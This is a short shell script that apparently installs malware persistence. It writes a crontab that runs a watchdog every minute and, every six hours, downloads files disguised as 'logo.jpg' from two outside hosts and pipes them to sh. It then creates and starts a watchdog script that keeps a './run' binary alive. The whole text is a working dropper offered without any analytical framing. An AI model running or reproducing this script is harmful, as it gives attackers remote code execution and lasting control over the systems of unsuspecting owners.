pwd > dir.dir
dir=$(cat dir.dir)
echo "* * * * * $dir/upd >/dev/null 2>&1" > cron.d
echo "1 */6 * * * curl -fsSL http://3389.space/lx/logo.jpg|sh  >/dev/null 2>&1" >> cron.d
echo "1 */6 * * * curl -fsSL wget -O - -q http://www.qicheqiche.com/plus/img/face/js/logo.jpg|sh  >/dev/null 2>&1" >> cron.d
crontab cron.d
crontab -l | grep upd
echo "#!/bin/sh
if test -r $dir/bash.pid; then
pid=\$(cat $dir/bash.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./run &>/dev/null" > upd
chmod u+x upd
./upd
